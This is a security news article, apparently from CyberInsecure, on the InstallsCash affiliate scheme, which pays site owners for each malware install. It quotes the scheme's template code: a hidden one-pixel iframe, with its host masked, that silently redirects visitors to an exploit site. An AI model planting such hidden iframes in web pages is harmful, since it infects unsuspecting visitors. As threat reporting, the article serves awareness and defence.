Infect Your Own Website Visitors For Russian Cash
InstallsCash partnership program offers the affiliates to put a short one line iframe code on their website pages. Next this hidden iframe would be used to silently redirect any visitor to another website to install via an MPack like process the affiliation program. Each successful installation made from the affiliate site would involve a payment.
To cover the tracks, the InstallsCash registrar is, of course, from China (bizcn.com). Fake registrant address is in the US (Iowa City) and the e-mail contact is a free webmail service that is popular in Russia (ydwrtyxamz_at_mail.ru). Obviously, this email account name was randomly chosen.
Subscribers of this “program” will be offered a list of allowed systems of payments. These systems are the regular ones used by online criminals. Having done that, one will be asked to wait for 24 hours until account activation.
After this period a subscriber will receive the IFRAME code, something like:
<iframe src=”http://**************610.php” width=1 height=1></iframe>
The iframe has to be hidden on subscriber’s website and point to some another website, using a strange name randomly chosen and created using a more or less automated method. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be feed into their stats page and then they can calculate the payments.
Basically, subscribers are paid for unique loads of InstallsCash IFRAME, which means that whoever signs up for InstallsCash and installs their code, is infecting and redirecting visitors of his website using this invisible iframe code.
InstallsCash distributer admits and warns: “…they will be updating every 3 days and they will be invisible for every antivirus!”
Registrar is bizcn.com and registrant contact came with another random e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us
It seems that behind InstallCash, IframeCash (September 2006) and IframeDollars (November 2007) are hidden the same people. In November 2007, the RBNExploit blog discussed that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business.
McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Some additional files are detected as Downloader-BDH.
More on CyberInsecure:
April 3rd, 2008 at 7:14 am
[…] http://www.installscash.com Interesting artikles about the company and how it works, you can find here: https://cyberinsecure.com/infect-your…-russian-cash/ http://www.avertlabs.com/research/blog/index.php/category/data-theft/ (above middle of the blog) […]